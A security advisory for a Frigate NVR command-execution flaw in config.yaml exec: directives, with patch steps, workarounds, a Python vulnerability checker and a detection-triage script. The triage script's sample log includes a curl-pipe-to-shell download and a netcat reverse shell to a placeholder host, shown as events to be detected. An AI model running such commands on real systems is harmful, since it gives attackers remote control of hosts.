CVE-2026-25643

9.1 CRITICAL

📋 TL;DR

CVE-2026-25643 is a critical remote command execution vulnerability in Frigate NVR. The exec: directive in the video stream configuration (config.yaml) is not sanitized, so whoever can modify that configuration can make the Frigate host execute arbitrary system commands. In practice that means an administrator, or any remote user when Frigate is exposed to the internet without authentication; deployments where only trusted administrators can edit the configuration are not exposed to unauthenticated remote exploitation.

💻 Affected Systems

Products:
  • Frigate NVR
Versions: All versions prior to 0.16.4
Operating Systems: All platforms running Frigate
Default Config Vulnerable: No
Notes: Only vulnerable when an exec: directive is present in config.yaml and an attacker can change the configuration, either as an administrator or because the instance is exposed without authentication.

📦 What is this software?

Frigate is an open-source network video recorder (NVR) that runs real-time object detection on IP camera streams. It is usually deployed as a Docker container and bundles go2rtc for stream restreaming, which is where exec: stream sources come from.
⚠️ Risk & Real-World Impact

🔴 Worst Case

Full system compromise: the attacker executes arbitrary commands on the Frigate host, installs malware, exfiltrates recordings and data, or pivots to other systems on the network.

🟠 Likely Case

The attacker gains shell access on the Frigate host, compromising the NVR and the camera streams it manages.

🟢 If Mitigated

No impact if authentication is enabled and the system is not exposed to untrusted networks.

🌐 Internet-Facing: HIGH - Systems exposed to the internet without authentication are fully vulnerable to remote exploitation.
🏢 Internal Only: LOW - Requires administrative access or exposure to internal attackers who can modify configuration files.

🎯 Exploit Status

Public PoC: No
Weaponized: UNKNOWN
Unauthenticated Exploit: ⚠️ Yes, but only on instances exposed without authentication
Complexity: LOW

Exploitation requires the ability to modify config.yaml, which normally means administrative access, or an instance that is reachable without authentication.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 0.16.4

Vendor Advisory: https://github.com/blakeblackshear/frigate/security/advisories/GHSA-4c97-5jmr-8f6x

Restart Required: Yes

Instructions:

1. Back up your config.yaml.
2. Stop the Frigate service.
3. Update to version 0.16.4 using your package manager or a manual installation.
4. Restart the Frigate service.
5. Verify the update was successful.

🔧 Temporary Workarounds

Disable exec directive

Applies to: all platforms

Remove or comment out every exec: directive in config.yaml, then restart Frigate so the change takes effect.

# Edit config.yaml and remove lines containing 'exec:'

Enable authentication

Applies to: all platforms

Configure Frigate authentication so that only trusted administrators can reach the web interface and change the configuration.

# Configure authentication in Frigate settings

🧯 If You Can't Patch

  • Implement strict network segmentation and firewall rules to prevent external access to Frigate.
  • Enable authentication and use strong credentials if Frigate must be accessible.

🔍 How to Verify

Check if Vulnerable:

You are vulnerable if the Frigate version is below 0.16.4 and config.yaml contains one or more exec: directives.

Check Version:

docker exec frigate cat /VERSION 2>/dev/null || grep version /config/config.yaml

Note that the grep fallback only reports the config file's own version field, not the running release. The running release can also be read from the API on Frigate's internal port (typically 5000):

curl -s http://127.0.0.1:5000/api/version

Verify Fix Applied:

Confirm that the running Frigate version is 0.16.4 or higher, and that the exec: directives you still rely on are the ones you expect.
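The "disable exec directive" workaround and the "Check if Vulnerable" step above both come down to the same two questions: is the running release older than 0.16.4, and does config.yaml contain exec: sources? The following script, added here as an example (it is not Frigate's own code), answers both offline. The version string format (`0.16.3-abc1234`), the sample config and the assumption that exec: appears either as a key or as a `- exec:...` list item are all assumptions for the example; pass it your own config text and `docker exec frigate cat /VERSION` output.

```python
import re

# First fixed release named on this page.
PATCHED = (0, 16, 4)

# An exec: source as a YAML key ("exec:") or a list item ("- exec:ffmpeg ...").
# The lookbehind stops "reexec:" or "my-exec:" from matching.
_EXEC_RE = re.compile(r'(?<![\w-])exec:')

# Constructed sample config (not from a real deployment): one rtsp source,
# one exec: source, and one commented-out exec: that must not count.
SAMPLE_CONFIG = """\
mqtt:
  enabled: false
go2rtc:
  streams:
    front_door:
      - rtsp://user:pass@10.0.0.5:554/stream1
    garage:
      - exec:ffmpeg -hide_banner -i rtsp://10.0.0.6/live -c copy -f rtsp {output}
    # exec: this one is commented out and must not count
cameras:
  front_door:
    ffmpeg:
      inputs:
        - path: rtsp://127.0.0.1:8554/front_door
          roles: [detect]
"""


def parse_version(version: str) -> tuple:
    """Turn '0.16.3-abc1234' or 'v0.16.4' into a comparable (major, minor, patch) tuple."""
    m = re.match(r'v?(\d+)\.(\d+)\.(\d+)', version.strip())
    if not m:
        raise ValueError(f"unrecognised Frigate version string: {version!r}")
    return tuple(int(x) for x in m.groups())


def find_exec_directives(config_text: str) -> list:
    """Return (line_number, stripped_line) for every live (non-comment) line that uses exec:."""
    hits = []
    for n, line in enumerate(config_text.splitlines(), start=1):
        stripped = line.strip()
        if stripped.startswith('#'):
            continue  # whole-line comment
        # YAML trailing comments start with whitespace followed by '#'.
        code = re.split(r'\s#', line, maxsplit=1)[0]
        if _EXEC_RE.search(code):
            hits.append((n, stripped))
    return hits


def is_vulnerable(version: str, config_text: str) -> bool:
    """Vulnerable only if the release predates the fix AND exec: sources are configured."""
    return parse_version(version) < PATCHED and bool(find_exec_directives(config_text))


if __name__ == "__main__":
    for lineno, text in find_exec_directives(SAMPLE_CONFIG):
        print(f"config.yaml:{lineno}: {text}")
    print("vulnerable on 0.16.3:", is_vulnerable("0.16.3", SAMPLE_CONFIG))
    print("vulnerable on 0.16.4:", is_vulnerable("0.16.4", SAMPLE_CONFIG))
```

A clean result from this check does not by itself prove the configuration is safe from an attacker who can still edit it; it only tells you whether the precondition this page describes is present right now.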

📡 Detection & Monitoring

Log Indicators:

  • Shell or other unexpected child processes spawned under the Frigate or go2rtc process tree
  • Unauthorized modifications to config.yaml, especially newly added exec: directives
  • Commands in Frigate or go2rtc logs that do not match the ffmpeg invocations you configured

Network Indicators:

  • Unusual outbound connections from Frigate host
  • Suspicious traffic to/from Frigate web interface

SIEM Query:

(process.name:sh OR process.name:bash) AND (parent.name:frigate OR parent.name:go2rtc)

Without the parentheses the AND binds tighter than the OR and the query silently matches every sh process on the host. Legitimate exec: sources also spawn a shell that runs ffmpeg, so baseline those and alert on anything else.
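Added example (not from the page or the Frigate project) of the detection logic behind that query, run over constructed process events. It applies the corrected boolean grouping, then separates the shells a legitimate exec: source spawns (a shell running ffmpeg) from anything else. The ECS-like field layout, the process names `frigate` and `go2rtc` taken from the query above, and the sample events are assumptions; real process names on your host may differ.

```python
import json
import re

SHELLS = {"sh", "bash"}
FRIGATE_PARENTS = {"frigate", "go2rtc"}

# What a legitimate exec: stream source looks like once it reaches the shell.
BASELINE_RE = re.compile(r'^(/usr/bin/)?ffmpeg\b')

# Corrected form of the page's SIEM query, with explicit grouping.
CORRECTED_QUERY = (
    "(process.name:sh OR process.name:bash) AND "
    "(parent.name:frigate OR parent.name:go2rtc)"
)

# Constructed sample events (newline-delimited JSON); none are from a real host.
SAMPLE_LOG = "\n".join(json.dumps(e) for e in [
    {"@timestamp": "2026-03-01T10:00:00Z", "parent": {"name": "go2rtc"},
     "process": {"name": "sh", "args": ["sh", "-c",
                 "ffmpeg -hide_banner -i rtsp://10.0.0.6/live -c copy -f rtsp rtsp://127.0.0.1:8554/garage"]}},
    {"@timestamp": "2026-03-01T10:05:12Z", "parent": {"name": "go2rtc"},
     "process": {"name": "bash", "args": ["bash", "-c", "curl -s http://203.0.113.9/x | sh"]}},
    {"@timestamp": "2026-03-01T10:06:00Z", "parent": {"name": "sshd"},
     "process": {"name": "bash", "args": ["bash", "-lc", "id"]}},
    {"@timestamp": "2026-03-01T10:07:30Z", "parent": {"name": "frigate"},
     "process": {"name": "ffmpeg", "args": ["ffmpeg", "-i", "rtsp://10.0.0.5/stream1"]}},
    {"@timestamp": "2026-03-01T10:09:45Z", "parent": {"name": "frigate"},
     "process": {"name": "sh", "args": ["sh", "-c", "nc 203.0.113.9 4444 -e /bin/sh"]}},
])


def matches_query(event: dict) -> bool:
    """Shell child of a Frigate/go2rtc parent: the grouped query, evaluated in code."""
    return (event["process"]["name"] in SHELLS
            and event["parent"]["name"] in FRIGATE_PARENTS)


def shell_payload(args: list) -> str:
    """Return the command handed to the shell (the argument after -c), else the remaining args."""
    if "-c" in args:
        i = args.index("-c")
        if i + 1 < len(args):
            return args[i + 1]
    return " ".join(args[1:])


def triage(log_text: str) -> list:
    """Return (timestamp, parent, command) for every matching shell that is not a baseline ffmpeg run."""
    alerts = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        if not matches_query(ev):
            continue
        payload = shell_payload(ev["process"].get("args", []))
        if BASELINE_RE.match(payload):
            continue  # expected: exec: source launching ffmpeg
        alerts.append((ev["@timestamp"], ev["parent"]["name"], payload))
    return alerts


if __name__ == "__main__":
    for ts, parent, cmd in triage(SAMPLE_LOG):
        print(f"{ts} ALERT parent={parent} cmd={cmd!r}")
```

The baseline regex is deliberately narrow: tighten it to the exact ffmpeg command lines in your config.yaml, since an attacker who controls an exec: directive can also name their payload ffmpeg.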
